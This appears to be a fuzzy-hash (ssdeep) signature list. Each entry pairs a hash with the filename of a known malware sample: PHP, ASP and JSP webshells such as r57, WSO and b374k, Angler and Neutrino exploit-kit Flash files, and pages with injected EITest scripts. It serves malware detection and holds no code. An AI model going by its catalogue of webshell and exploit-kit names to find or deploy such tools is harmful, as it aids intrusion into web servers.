+1536:IoKR/4vMV0iR3w3rw0JA+XNpv+fRfACOBQP77YnGnbPjIUB7QMg2S2TZoF4YW2C8:bvMV0iR3w3rw0JACNp0fACOBQPnYnGnc,"2016-08-18-page-from-touche-pas-a-mes-certificats-verts.be-with-injected-script.txt"
+1536:IO6TYxsE0nwwQehzbFnOjIYOPOvWWAEgT9SRbJy/627t5rlosVSgnSPTCvygtKy:IQxcnwteNb4jIpGvWWAEiNJWgnSPT7y,"body.113.226"
+1536:InOZXmo7Ubrm5+CvM5KqSu3OkbJzRp3ZsbkGYat3xaqfVmX:InjoIucsM593OY9Rx84Yhaq9mX,"2016-06-10-pseudoDarkleech-Neutrino-EK-flash-exploit-vs-21.0.0.213.swf"
+1536:InoMkFCGR3Yz+TqoiLsRmH51cpWLSTm8+EgerjDWx67UMp9RLpzyujfYP:IO+H51XSTm85HI,"r57_by_yaduris.v1.42.php.txt"
+1536:Ini7F1jVngCGRK08+TqoiLsRmH51cpWLSTm8+EgerjDWx67UMp9RLpzyujfYP:IylgSH51XSTm85HI,"r57shell1.23-SpyGrup.Org-SpeciaL.php"
+1536:IkpvQjNc17MttlTWJ7dq87LUhpp0RpC9uyRkWyZeNDwyN+Nbc6rjnhMwCNzNv5N+:IhSdq87LUhp6RbyahQzBUDMx/qtD,"wso.php"
+1536:ik3WvGt94LJDbZATYDWV3glfW/d07+3JyCA4KlrBm:ikj4LJ3ZATYDWV3gdW/d07+sA,"2017-03-07-page-from-activaclinics.com-with-injected-EITest-script.txt"
+1536:iho7dNDnVel295QEzyF2/InebPLfE5dD9DeVxIUUoHvtv7TgWGOWzWS6:97jg25MebjfEnD9xE97MWg6,"2016-06-30-realstatistics-gate-Neutrino-EK-flash-exploit-after-lostreschiles.com.swf"
+1536:iHK+3kt2lTNSChcqDXQCA3zYBEXOlChMU4YjChS/FM2lChvWtIChRzeChzkxLocY:iHl7P3BZ6fq8bpyVQG4htn,"2016-02-22-page-from-compromised-website-naples.com.txt"
+1536:iHFdnuZ09BY9/FOIXKU/J51hr7yB++F3UDmvh1gOrS:iHF0Z09BKJlW3Smv3a,"2016-05-25-EITest-Angler-EK-flash-exploit.swf"
+1536:igZcMxXAJXvwyN0T+UA6Yx/gVJj/NdvcMlUnylHJp4TKqJnEbC9fGo/:iYcccXvwA0TyzgVp7vUnS4OqJn0Bo/,"2016-03-24-Nuclear-EK-flash-exploit-after-macfly-studio.com.swf"
+1536:iFIpSvDsYCJVhdUZO4mqkAoJBlTRVvoVhsgZG0REMKV18:iFyoDsYCnQZO4mqefRyhJrEjf8,"2016-05-26-Angler-EK-flash-exploit-vs-flash-21.0.0.213.swf"
+1536:ieNAqezjO9r65fARj3RwTs4fXcP/Kb5HKWOjIpG63/:iCAqezjO9gA132Ts4fX4WGfE,"G5_by_Piaster.v1.6.php.txt"
+1536:ic+yU3QfTJjn1T4oNrWCQHqhokRrIq1VbYvNueqBn4CUMbBBBkhwLxysTkD:ikdjyoNiCQ491a05BxH7khwLxHTa,"2016-07-15-other-Neutrino-EK-flash-exploit.swf"
+1536:IC7bNk5S12J+vrCwtpM9KiztMzp6dwpRLk4TsHH4QRzwPz4:ICW5m2KiztMzp1ROJ+4,"VirusShare_4b0837d6e6d833cfd3e1c1acf1aa590a"
+1536:IAgCPb/hL/fXAEh+xED/VUhQQ8b55ad+tFR+8c2Wj1otmx3:vP1TAEhQED/VO8dbPgljxos1,"150.php.txt"
+1536:I90mv63ilv2vl9ln4om/clT0LeoSAnkTO9kaeePeLxVkX3T8:zmvl299ln1uLe+nkTO+almLDU3g,"phpspy_2009mssql.php"
+1536:I8PYbvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfU:I8PYbvw60sWyB5Vx3ju1Ua9mE9x7CSlh,"swift 4f1a.js"
+1536:I6TYxyHvwrNrub0SeW0nPKPUpKbAgCV3zZjV0UteC0wY5rl5gnSPTCvAtS:WxUMNrtSMnPKMpKbAgSPAJ5gnSPa,"body.113.099"
+1536:i6TYxyaKwEPrMwc3wYgnqgcn4UWy6rD1Qr9YIg8zvv5rlFgnSPTCv2tS:0xm1cgYgEbtEMlhJFgnSPE,"body.113.082"
+1536:I6TYxyaHwQMyKVSKxzbCJ3uRZyZPnrlL+SiAKFrU/qbgHJyGeEnxOrllgnSPTCvm:Wx7/KVSgz8uRZyZPnruFa0lJlgnSPCy,"body.113.118"
+1536:I6TYxya6whaCfXMeeFKtosrHMkUohGyVmJn3pOZ7g9phOrlmgnSPTCv0tS:WxucXaGoBnogJXpYJmgnSPW,"body.114.003"
+1536:i6TYxXEWwRVnPIyiz9w9da5zFq/Fd8iBZQDmu5dTmcvI4WgnyPTCvStKy:0x1iVPIx9w9uFq/DE5gcxWgnyPAy,"body.113.281"
+1536:i6TYxXEmwlOZx8rcpE5f86jnqgD8Gg08n4VRtWxg1QAS7gnyPTCvCtKy:0xlaOZx8ryYjkGTKp7gnyPwy,"body.113.269"
+1536:i6TYxXEm88f/dOxuw/IUfZxWKM+L41RAaygnyPTCvetKy:0xhLf/Nw/IiEygnyPUy,"body.113.285"
+1536:I6TYxXE188+/sVs6Ug4cYKpO8DJJzYwXOiqIxI8eQ2f4jMOtw4JL/gnyPTCv8tKy:WxIL+cs8YgJzYwXaO2k3DJL/gnyPCy,"body.113.365"
+1536:i6TYxsEywZamN5MxsreACb3wk6uVR2YAZ/CFFOrlKgnSPTCvetKy:0xatmN5MxsrNCbiH1XJKgnSPky,"body.113.227"
+1536:i6TYxsEjmweGYZzgQ8MUgKmkBlDISmed9RX/iMJ0qOrlYgnSPTCvytKy:0xrm4MXK1BlD5MJYgnSPAy,"body.113.225"
+1536:i6TYxsE9wl5o7W/InQsVApPXHgVu77OrlggnSPTCvKtKy:0xVyTIns+JggnSPoy,"body.113.202"
+1536:i47lEoz4u9UETVlukVt9JW4VLx/unoDSSR027br/n3z+dDakdzyqyxigT3xUd1J/:/WyVknoDSkaDh,"r57.txt.4"
+1536:i47lEosPu9UETVlukVt9JW4VLx/unoDSSR027br/n3z+dDakdzyqyxigT3xUd1J+:/eyVknoDSkaDs,"r57.txt.002"
+1536:i0Wt4QiJr5b3g0Hzjos1jmeaWKFJsKvQb:s4XE/FJs9,"2016-06-01-page-from-lidcombeprogram.org-with-injected-pseudoDarkleech-script.txt"
+1536:HxUEeGlLvOPm98hVL/nYfJZnhHiaCqSbFaeYtTtvhpKS/Ec1TgnFlLonKrEg6:Hx1Fmj/GZdiySNYptXh0oW6,"zaz.php"
+1536:hx9tlskkN2Lqq10Aj/ZVAd/apfXQ+wkT34rSWCob:hFlskk4/ZVAdn+wkT34rSWCob,"phpspy_2013未加密.php"
+1536:HX5bNl5R1DfvrvdtpM9KiztMFpqTwBRde+74Uf7wPzn:H95XkKiztMFpPRvbWn,"vip.php"
+1536:hWqeh6OS4hSyGoFmj+TqoiLsRFM51aHWLSTmt+EmxYYSWxAzCsepIoKFRHps8jdO:h4bS+FM51XSTmtiCI,"r57shell-v1.24.php"
+1536:hVmgZzm31z5ysriezZWm9Yja4hMAJOw6nZW8Z+NK:hRZzm31zKetWr+WMAJO1zZ+NK,"b374k-2.4.poly.php"
+1536:/hV6gKqNsuCQprM+VArAuBzRvUZLoiFE4EkZDjB6fqqZB30JBkD2ET4cPIIMSe:n6fqmQG+yvR+oNkZDjB6fq9kX4cPIIMz,"r57.jpg"
+1536:HuhsrQf9FgBEh5kjUiyqWY/z7IlRBESLbbFBn:uvgBEh5b1N,"2016-05-16-EITest-Angler-EK-flash-exploit-first-run.swf"
+1536:HTZYMS7yNJu1OWPKnBi9VWVz4gaaGxOTiUgaDRZBUby/nKmQ3:HdzSSJuwcr3g3KOTzBUby/nK7,"Digital-Outcast-webshell.php"
+1536:htXIx28bX3krPXsDHa3tHDP8E7ejEi4eo/GBskMDL57EuZei:htXc28zssDHoB7ejHOVZei,"theme.phps"
+1536:HsSG7AY7stAIelzEDOqDFIjanEDOgDFIqxc/InIOIBI+nwU6gq0qYuMv:Q7stwzEDOqDFIjanEDOgDFIqxczV,"Daisy.jpg"
+1536:hSm93TjzWze/8yUOqwzNdMvQ43se0hG1cmgp7JW33LqLkFrc3/K27TcEB+s6YYeo:hf97SfwzPmQwgp7JC3Lfhocn34y,"2016-06-29-Rig-EK-payload-after-glamgirltube.tk.exe"
+1536:hqcNhnXX9mmM+K7Ipm5vz50MchIOS4lo3Pue:h7HrK7Ipmz50MfO//e,"ff0edd52356b7370b29b3f2d20970ecb_php.txt"
+1536:HPgVeCcwNU+PMlmr1fzLxCXVWX5CuLRDc:HGc0ULsr1xtXR+,"boffmax_v1.0_web_shell_by_the-c0de_team(1).php"
+1536:hPfXjIxadjUknLIAaE0h4Oup4Cizzis4Y:JvWeqisR,"2016-06-02-page-from-mfgsci.com-with-injected-pseudoDarkleech-script.txt"
+1536:Ho5NcGr3COkHaMLKTQpqPDRCmKVMQ44B4IPXd:HvquKTQpuRCmLQpld,"wso2.php.txt"
+1536:HNMNSXxeaHE62r9vIhr3yI2e55x4RW/ZkmmX:HASNE6O9Ahr3X73/Fm,"login.php.1"
+1536:HLIGMtzpNVPbk5eKUn/kYd7KUn/kYrE8s4vJUTtFQs1VZ9/oi9IjOkrgZ3kL8PwC:UGrkE8xZOkhy1,"JspTqz.jsp"
+1536:HkPnkPnkP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kP0kPr:c,"01-jfif.asp"
+1536:hjE5gNdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:ht4,"good.php.16"
+1536:HiO2SaqpCER0uZORv2GW4Uq6zI7VOiYSbO6LUDg30x/NZna:H73pCERApHB7VOzArmg30L8,"2015-09-08-Neutrino-EK-flash-exploit.swf"
+1536:Hha9TwOTTsDh1xf/CIHoHALBWb4LhHQ3cOpN4GeZZkB:HhabT+TxyALEAHQ3mZkB,"dlc.tcl.zip"
+1536:hfEOQdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:h1,"good.php.37"
+1536:hFb/gkXXMlidJzaWRNeWdzaWRNehEQOaczUKR7cuCOo+LkD1MuHySaYf9wnlXeP9:hx/mEZtIDGuHySaPan,"JspSpy Private Codz By - Ninty_encode.jsp"
+1536:hEvlJ/dWLaz7ApADAbWrzytPhOVQfr0SG1tnMpVPTr+4cHjEEqoU3:hOlJwOz7HDAb0zY0Q3GXncVP+nHjFqo4,"2016-06-02-pseudoDarkleech-Angler-EK-landing-page-after-mfgsci.com.txt"
+1536:hENthoMiMps6Iwu3CTOpDKn5/X2JkzIjGaxz4IB7OfODaY:iNthoMiYc86kzba+lfODr,"2016-07-13-EITest-Neutrino-EK-flash-exploit.swf"
+1536:hCoYSazwh+EOcIFcQXeV1E02q6TlZiQ3Vv/SxMCixZfowxZ68J1foZ2B7cHll0Az:c6ac413FcQXzq6bZMWZpxA87foS7SXdf,"2016-03-29-Nuclear-EK-flash-exploit-after-macfly-studio.com.swf"
+1536:/hAbDUFuIbulrINzmFFdC9vSnrlSbo+RQSSSSSSSSSSSSS+TjXfTCJyvPpw9efZG:eUFulMWFQ9MrlHp/Ikwl,"nstview2.jpg"
+1536:h7/Ru4LmUIH76WqUUpTWmsTdgRbcvat0ZyG47Y/4+kEvT1P:h7RDq6lFpRVbIat0ZyDKT1P,"3ea0916abc1e90296e8160f469e46429_php.txt"
+1536:H6TYxya6w8lqD3T4wE4r7ucAJrd3QbrVGsTii+M7B+dLsvzWSC5rlegnSPTCvDtt:hxWHlqD3T4wT7C3YrVGsTiKeJegnSPhy,"body.113.109"
+1536:H6TYxXEs88ggQBIryrpQdG0akU6Z6f6m3tvS+L6rQHPEZ6JujHKDgnyPTCvHtKy:hxnLgrBcG0akBEf6m3tvrSHKDgnyP5y,"body.113.327"
+1536:H6TYxXEGwlTcT6hF2LlsPPnPIs5tI2MURi/oj9A1BI+u7a7gnSPTCvTtKy:hx94hF2KPl5tI2NB7k7gnSPdy,"body.113.247"
+1536:h6TYxsEWwHYmeGCqwunC6ekD8tG68gDlkT5P+9k5rlugnSPTCvltKy:XxOnGAunCttSDJugnSPLy,"body.113.195"
+1536:h6TYxsEfwEqn5q+bTCPd6IkIsTJ0rsRNcYBXstdlM05rlwgnSPTCvxtKy:XxXzUZbTCHzsTWrNJwgnSPzy,"body.113.179"
+1536:h6TYxsEbw3znW/TH/QWmvKyCWUllCZMiGjZiIEPwa2OMPOrlygnSPTCvttKy:XxzBwKyC7lCZRGWJygnSPXy,"body.113.157"
+1536:H6TYxIo4twcAOzQu8UxcRA3oDeb+Qji+cguPTCvm:hxYAOzQu8tx+cguPt,"body.114.001"
+1536:h6gxqzWyLqt8i05T5ZHs6kFWVApRUycvXLO13sZnM0Y3UE0bsnZqdEi+87h5EEBA:5o0t65zM6kFhPsZnEHZs+K/BG,"s2.php"
+1536:h6GPBd+M+wEj3f0DFaaEAgP5TA20fHPe+s60MZeujbFfD4gQDkmQLxJYc95IcF:h6GTN+wEjmkXPBToHPvs60MAcV/mQLgS,"2016-06-28-Neutrino-EK-flash-exploit-after-tonwyattwood.com.au.swf"
+1536:H4gVeCcwNU+PMlmr1fzLxCXVWX5CuLRDe:Hrc0ULsr1xtXRQ,"BoffMaxv1.0.php"
+1536:h27Lllb8fFS5TnmogOSuDfNMkTEeyrevMe1eSebeteTe3ekekkXYb1rdoNxV4iSK:h27Lllb89S+hX0xyZYpqxJT,"2017-02-22-page-from-techydiary.com-with-injected-EITest-HoeflerText-script.txt"
+1536:h17B+c8Xd9bz9BeyA/STRVqztBs39+grvrcSgU6O5is:T7Br2d9z9BaoVotuN7gU5is,"b374k.vip.2013-obf.php"
+1536:H0Im3YCbpizInTG7cDw+Megfzddsv1g6QbW+qxAVrBRyMKebSbmwsLa:HIb1T0c0e0zi1gY+qxAV1RyMR26u,"injectionv3.rar.001.001.001"
+1536:GZ54z6fs9I72ASvAzvyB5rh5hhKy5d7fjlA11:GZOz6GI7ty/rh5hhKy5xpA11,"2017-03-07-Sundown-EK-flash-exploit-1-of-2.swf"
+1536:GYOGLthcVt/WaKds4O2KQ4nFARuIFdff6tEq:GYJitxK9efnFzodfc,"3cadev.php"
+1536:GX6TYxsEbw8OplFBA194lbswceYUt1xqx0QpGe7OJKsogbPfBCaOrljgnSPTCv47:Gxxz3OplFBnbswBxqx0QXK4JjgnSPKy,"body.113.151"
+1536:GvtqqzYNaKXZzT54YleUXkSnlg0oKgvru3D2tHqUIZdu:xNJkSnO0ng/HqY,"r572.jpg"
+1536:GsNXIlidMzaWRNe2dzaWRNedOnn9cum26bkWsEKpcgJ:GqnWPMkWsZJ,"aspx.jpg"
+1536:GPBcELJ7QZKw5Tega2cxLDV0EhFRQOT17ALoI7vCDzx8YYS0+RgvHCsSE:QX0ZEhZxLDy217ALJ7vCDzGYH0QgvHCC,"2016-03-18-other-Angler-EK-flash-exploit-after-1nationradio.com.swf"
+1536:GNwRzE9rDDLef8zXNScuZq36YR/164jSWWIqjKj90CTx2KCDbK/+LQZ8l:rRw9rDHemdScx360164jSWW/w90CToKu,"2016-07-21-pseudoDarkleech-Neutrino-EK-flash-exploit-after-opencv.org-second-run.swf"
+1536:gNgz8A81o0F1Su5I4AFAxmO6ogvhEC4/CBHNBn0CDAB2/lC57:gNgz8sASu5I4AFAxP6ogvmCBASlC57,"MetalSoft.Hackers.Team.v1.1-metaslsoft.php"
+1536:GMU0NYzZiCHYWeuFMZKQ7lU8pbMUIvRhL1S4dSNP7o:Gxz9CKQ7lU8pERL3qo,"VirusShare_eaeb8870afcd1e17c5d196fa86fb8e28"
+1536:gL6TYxXEMusLwnBpgs1biKEKOp1LmRqqR1uWjXxtCwDyTX4YgnyPTCv+NtKy:WxsO5sdNY1LmRqWuIYgnyPGy,"body.113.264"
+1536:gi999999999999999999999999999999HpXpOJ6cZiEupyqj1NHmSmfueja0wG7B:Dq6GiEZ4yS9z0wcDNFELyjZ,"PHPJackal v1.5.jpg"
+1536:GFb/gkXXMli+JzaWRNeWdzaWRNehEQOSczUKR7cuCOo+JkDlMuHySaYf9wnlXePY:GxwmEZ1qD2uHySa2an,"c5.jsp"
+1536:gF4An91+XD6vOnasl3EEhLaWhYTXR6V8C9/xM1jv5ON7inNKeplUKH23lDz4kv9:rAn91mfl3EZWhy6CI/y1jwN7KN5lUZ1l,"2016-07-21-pseudoDarkleech-Neutrino-EK-flash-exploit-after-opencv.org-first-run.swf"
+1536:Ge6jYdBXUzSBbmKk7Xi379FveAnff8TOt9Caos4U:rdBXUzSBSy3/nXG69CaD,"20160204-193821-VrMcDWjuZ1YAAGvtBX0AAAAY-file-AeRnvi.1454578701_1"
+1536:gD8A3jcUL9v0DtwdxKNDcXSEz19kENRzgXrM02Jqp3aObTd864TzRTbHBCKK:m8A3jX9v1dBXfzsEcXqqMmETzRTVCT,"2016-07-01-pseudoDarkleech-Neutrino-EK-flash-exploit-after-gennaroespositomilano.it.swf"
+1536:gbGjbjKJlCMAQUnKRWxZbNFYkMAjssV0HI9bhi9t+W:gbGjbjKJpenKRWxZbNFYBWso2t+W,"DxShell_by_Tync.v1.0.php.txt"
+1536:gbGjb7KJLCMAQUnVdWH/5N7YkIAj68j0y+9bD+9tsg:gbGjb7KJ3enVdWH/5N7YrW6hatsg,"DxShell.1.0c.php"
+1536:gBfRy8FxbNKFSWjKiMCBDl8O1KFKltHbwAbsx/0astdG5Sa7979lQT46z7ExU:gB5vGFSWjRMCpOOcYlRbhq/0XM979lor,"Backdoor.ASP.Ace.ex-十三WebShell.v4.2共享版.asp"
+1536:g9n7rWWwyd0R4FWDCObRDQlJGxSQtlCganLaffXpvpabziBHloV9Eae:ynJwaxI+Ot8/Gfl7swfZvprBF6S,"c697a44e50e9aab145ca9002e0469b23_php.txt.001.001.001.001.001"
+1536:G8kcLrHFypcFzlV/AMFnT4BGRzekn69yhOS:+cFypcFfoATkGZtn6AhD,"土司搞基asp大马 (1).asp"
+1536:G8kcLrHFypcFzlV/AMFnT4BGRzekn69yh1S:+cFypcFfoATkGZtn6AhM,"土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp"
+1536:G6TYxyFxw4z9AnA1dPfZaqjKIHXUynVZtwtMRuFOG+Loh5rlYgnSPTCvOtKy:YxEdz9AnATfzKIHEuVyKuNJYgnSPoy,"body.113.144"
+1536:G6TYxYahbE5rHgH+eydajZqFwFhMyHDPaKnPlyK+IVgtSPTCvOtS:Yx7gHgHHjZq61n+IVgtSPI,"body.113.041"
+1536:G6TYxya4wbf7LL6VbORkGJgHyL1Ds3ZJze/g1rcgpeHbgOPOrlMgnSPTCvStKy:Yx0BORk+g21kZYYlgyJMgnSPIy,"body.113.115"
+1536:g6TYxXEtwCIakrf8qg6XdZzE/CMWtZ2wgUW3/eMWv+CYRKauFRgnSPTCvMtKy:+xKB6XdZzdtZ2wzeuRgnSPiy,"body.113.243"
+1536:G6TYxXEONwT838WpI55+bFBreMaEGcrgm8hxZOroGeNS4NgnyPTCvGtKy:YxvNzIz+bFnr9KNgnyPAy,"body.113.267"
+1536:G6TYxXECc888FDAqQKMpvvXlSqEWXOSpgnyPTCvKtKy:YxPcLMMK8pgnyPUy,"body.113.311"
+1536:G6TYxsEVwBhrThkjonlS5BVThZDrQzNwlOrl2gnSPTCvStKy:YxdWhkjonlSR4J2gnSPsy,"body.113.176"
+1536:G6TYxsERw9NDfMQn866c+qe6MFRyP92d29/ZBJCOrlSgnSPTCvKtKy:YxpyNDfv866767jVJJSgnSP0y,"body.113.163"
+1536:g6TYxsEOwutzRQ3MEQv9S9VlCjVkcXwRh+fr+XXFOXbL4i7H05rlagnSPTCv0tKy:+x25zilCjVk7h+fHHeJagnSPay,"body.113.223"
+1536:g6TYxsEjwswiai8D+6zIvPb2mhJOXDcitInI2KPMr5rlsgnSPTCvItKy:+xLyjD3OCmS4ZvJsgnSPyy,"body.113.212"
+1536:G6TYxsEbwgucuFY/CoL+3PwBW6W59SQsVApPXHgVu775rlegnSPTCvOtKP6TYxH:Yxjxvf/CKBWv9SsJJegnSPoZxH,"body.113.203"
+1536:g4RtPvl+LliPeda0R3eo9da0R3e2EvWFCZKIVVvOzPjiTuWw6T4TR/rBPjpu22zD:9tTEEvzKWw6OaD,"ks0ljvi9m2.txt"
+1536:g30hR0rffXrTGWQ89INUsy1pRBRgFSawZ:YnrRMWRzgFSVZ,"Variant.Kazy.zip"
+1536:g1qGp3QmuJmLOFGAVSNzoMp10WX+vSDQb3nYWSKeNf:G5aMOFGA4HpOG+PIWSKGf,"2016-07-28-pseudoDarkleech-Neutrino-EK-flash-exploit-third-run.swf"
+1536:G0PIHYRXbKGmp/x6StUdkfzdx/0kKjWvHlQnohlkeP/JoBRG0tN2q:G0AHY5b8QS+do/06vFQohlkePBoBRfbH,"Backdoor.ASP.Ace.gd.asp"
+1536:G0IY6RT0nkg2d7kUnsevJ3QDISTkQi+ezEYEjf3K9t2ojQVA:DIN0nMt7vSDISTkZzCf3qt2eQK,"2016-07-07-pseudoDarkleech-Neutrino-EK-flash-exploit-after-lawrenceparkah.com.swf"
+1536:FsNXIlidMzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pc9J:Fqn8dMkWsWJ,"nogfw.jsp"
+1536:FsNXIlidgzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pcFT:FqL8dMkWs4T,"ok.jsp"
+1536:fpqYOIwTWNuuAlgU8c9psCuhFyANa2cO5NxLWSoTui2QSzhe88kZcaiGxB08p18E:sYOIwTWepsCuhF9NxekZcaEi1t,"r57.txt"
+1536:fNE5gNdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:fD4,"good.php.14"
+1536:fhB2wZ/Dc7hV7T7NMipKWwTmnYmv8sf2Kt0fSNNNNNNNNNNEZM7f:JC7tETTFY,"2016-05-26-page-from-brookslake.com-with-injected-pseudoDarkleech-script.txt"
+1536:FfWMOcNNqtaBORk+cr9mmMaKXPzVp+y364C6MIy3PfPh:FOMyRjK1KXPzVpzwp,"wso-4.2.5.php"
+1536:FFIpSvDsYCJVhdUZO4mqkAoJBlTRVvoVhsgjosGc03r:FFyoDsYCnQZO4mqefRyhzos2,"2016-05-25-Afraidgate-and-pseudoDarkleech-Angler-EK-flash-exploit-vs-flash-21.0.0.213.swf"
+1536:FEcNpWocvMmmMBKzVplyORAynnk4WEN7j3PDc:FdEKzVpvRvnFfc,"WSO_by_Orb.v2.5.php.txt"
+1536:FCNXIliXRzaWRNe4dzaWRNexJw3n9cum2YbkWsE0pQej:FwwJSLakWs9j,"JspHelper Codz By - Leo.jsp"
+1536:FbXVWpCUw1uSVVUG8YGd99a97sa/AU70bVbO2pFBktCr2t8/Zd4mGpG0GgyGhDmB:FXVWpCUw1uSVVUG8YGd99a97saV0BbO2,"Backdoor.ASP.Ace.bp.asp"
+1536:Fb6sDV1J11wI6qlSODfJAK3NBmQgRE8pYQgJqeLEOYAgqqV5ndEj3p6qMbB9Ju0:FXfvJ7lSMx9aXKDqDOZgqqV+QRV9f,"Backdoor.ASP.Ace.di-十三WebShell.VIP终结版.asp"
+1536:faEjtdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:fA,"good.php.31"
+1536:f8cN4oS8uyYFqnXjL5c6X6s6lmCIO2zaoC:hKU4J6X6s6sr4,"devilzShell.asp"
+1536:f7oqkKktKeYYxqOZImQ1uRGB/1SWQAhQUQxQ7QUQ8QAgOMZTHZsve3jofOAUZchk:kqkKkIeYYxqOZImQ1uRGB/1SWQAhQUQV,"2016-03-21-file-from-localtasteblog.com-with-malicious-script.txt"
+1536:F6TYxyaKwVqB0DvjfmU/X107E4Jcv+hwkp6rOzWMycBrlLgnSPTCvhtS:rxGVB0DLmU/YJcvQ5JLgnSPz,"body.113.066"
+1536:F6TYxyakw8U4Lg0M2PkaAt/S2QG8vxaMMaYYbPcp3nuNwOrlJgnSPTCvVtKy:rxQi4c0M2PkDt/S2z8vxaMrfJJgnSPny,"body.113.139"
+1536:f6TYxyaew17ArBd/3EsqZt/3zbdeJXoNueaxf68LOrl/gnSPTCvTtS:pxC+72/S3IJq+4J/gnSP5,"body.113.077"
+1536:F6TYxya4whZ4GVjxa2WjUBERr+tyUWQ7LDU3RPLNPYOuPOrlhgnSPTCvFtS:rxEyZ4Ixa2WjstxVQLJpJhgnSP3,"body.113.078"
+1536:F6TYxXEC88sRGUgrWfYV80uNilwDYWWhiSwngnyPTCvBtKy:rxHLsRGUgrWFy6KTwngnyPjy,"body.113.343"
+1536:F6TYxsEzw0tkOnXvYGU/fZQyR/TH/LlXoZ+jeH/Rv1VMbhOrlEgnSPTCv1tKy:rxL3kPfJFzlXoZfJEgnSPby,"body.113.158"
+1536:f6TYxsES/wubFpH1424cdOHpvlJ8VzfAvFTgie7EGPSRwDVKdHMc6cOrlQgnSPTk:px6/hH17hzYvxgie7EIOSJQgnSPJy,"body.113.215"
+1536:F6TYxsEJwyXJhy7kthyHY5V52f4TILkUKcK9MQXarbL3/ROrlVgnSPTCvVtKy:rxh87kmHU5mnZgJVgnSPPy,"body.122.001"
+1536:f6TYxsEGwG0nZR04HvU8OGHVx4KgynUONiOrlNgnSPTCvrtKy:pxej0nJMedPJNgnSPNy,"body.113.194"
+1536:F6TYxsE7wgd7OjeKeel32F5X7Yfu0VOV+46ePfHuMn/LdR2Y2gHx2C5rl+gnSPTy:rxzLd7OjeKef5KGuIBJ+gnSPry,"body.121.001"
+1536:f6TYxsE4winTKEza0pHC50Y3PuAERWylNogWIB8B986VyvEIvteE5rl8gnSPTCvH:pxAvnw0pHC50Y3P4mgWIJV8EJ8gnSPNy,"body.113.218"
+1536:f6TYxsE3CowthHcBPoxYLn+B85LwUkHFkM+TrJV19L5rlsgnSPTCvLtKy:pxPCoicBPrLn+B8pDkEJsgnSPty,"body.113.213"
+1536:eXgIk3A/zljFeLBSpYjlnfymIYUd2YD1miZ:GV/z1Fe1SIfXi2YDZ,"2016051523140225737.png"
+1536:eX8bNl5R1DfvrvdtpM9KiztMFpqTwBRde+74Uf7wPzn:eG5XkKiztMFpPRvbWn,"wso.php"
+1536:eV+p7VrQlGTXSySQe8ak4jPcQGDqaZyFJ66AhL0WUpvUNX1XIHjNE80I:RVCG+1Q1aKQ8yzqplU5cX1XIDNl,"r57shell127.jpg"
+1536:eTY6PtFMKO8I2ZhgeixJTyw53jKmXVhXF60onjBssf6a5zQeMFMkSLzJd:L6D3O8IAixJTywpjKmlTBo1ssfHiFGJd,"2016-07-13-other-Neturino-EK-payload-bandarchor.exe"
+1536:eTiK23+j2ddPm8Yz5MWvRkQ8xyhdagw0ndMxT14emDeZCHHiKNAQdFhtFhPh/R64:POj2ddPm8Yz5MWvRkQ8xyPv9dMxT14eg,"ASPXspy2.aspx"
+1536:eRnDO5qm55oY5YMK5hLorNspz5dPzVr2HIH0xIOew6TBDf8:S2XXR5YM4xrpld4H6sHew6TFf8,"egy.zip"
+1536:EpzqksURX9hqz3YdViX9jdzqf0uEhqbuIQfsSsG:EWVYdViNqbuIQfsI,"Backdoor.ASP.Ace.bq-中国.JiaJia.修改专用.asp"
+1536:epBJb68uxRfP5H7/gMAHZji/pU8OgcDVR4JjQS6:o568uxRX5T5xU8O7,"remview_fix.php"
+1536:emcNJWocvMmmMBKzVplyORAynnk4WENJj3PDB:e/EKzVpvRvn/fB,"wso.v2.5.txt"
+1536:emcNJWJcvlmmM9KzVplyqRAynnk4W7NJv3PDc:e/SKzVpPRvnGzc,"other-decode.php"
+1536:eMBJb68uxRfP5H7/gXAHZjilO+8OgcDVR4JjQSQ:V568uxRX5TMg+8Or,"PHPRemoteView.txt"
+1536:EK1eV/a6kjYrBr79bOJu+YExJZQVlmn1ZuhPiDLs1jZFMP1GO4:EKp6k299q8+Zdkmn1ZujZFU1b4,"2016-07-07-pseudoDarkleech-Neutrino-EK-flash-exploit-after-drupatis.com.swf"
+1536:eJyEOb7ELtc+UM3qicuvKYFs7toTWluDkY5kq3blcr651BWLwDnXBMJD4qKSC:eJSEOM3pcuvHY4BwxqL3VW0nXBYA,"2016-07-14-Afraidgate-Neutrino-EK-flash-exploit-example-3-of-4.swf"
+1536:eJyEOb7ELtc+UM3qicuvKYFs7doTWluDkY5kq3blcrVP1uRWLwDnXBMJD4qKS3:eJSEOM3pcuvHo4BwxqL2P1uWsnXBYt,"2016-07-14-Afraidgate-Neutrino-EK-flash-exploit-example-2-of-4.swf"
+1536:eJyEOb7ELtc+UM3qicuvKYFs7doTWluDkY5kq3blcrVmKvWLwDnXBMJD4qKSN:eJSEOM3pcuvHo4BwxqL0vWsnXBYb,"2016-07-14-Afraidgate-Neutrino-EK-flash-exploit-example-4-of-4.swf"
+1536:eIYb8Bl7PPDhEFkaYrjhX8JS2GfrIy/m0:eI+ul7PPHhrjhsJSwye0,"2016-03-24-TeslaCrypt-+REcovER+lwxbh+.png"
+1536:eimDSIrtrSHP/iqiwL/BAouzsKOBGE0cEv:eDlrSnWwjuzsKgGE05,"2016-04-13-pseudo-Darkleech-Angler-EK-flash-exploit-after-medical-library.net-first-run.swf"
+1536:EfvnGvo/iF87KBYsUG1ilSu5QHGJe2ucdE+nUMtOO9NaePM:E//imKRXInUCOO9u,"archive.php"
+1536:EEPEB4WoqvFtWULNI0bIl9SsAy2pgr9as3glq+I+PPJOa1yhpL:ddqvvWUmTSsABhOaohpL,"不灭之魂2014改进版本.asp"
+1536:EEfMxaJh2+s41m/nHE1hlRfi8lak4MpS8/UO9fWR:t0xaJoiMnElRfi8lak4MpzUO9fWR,"SyRiAnSh3llV8.txt.001.001"
+1536:edPRQGmsPzCjvw9J6Ux+0PA6r4TRDVlpu4:WJFmO+UxntEFBvu4,"nst.php.php.txt"
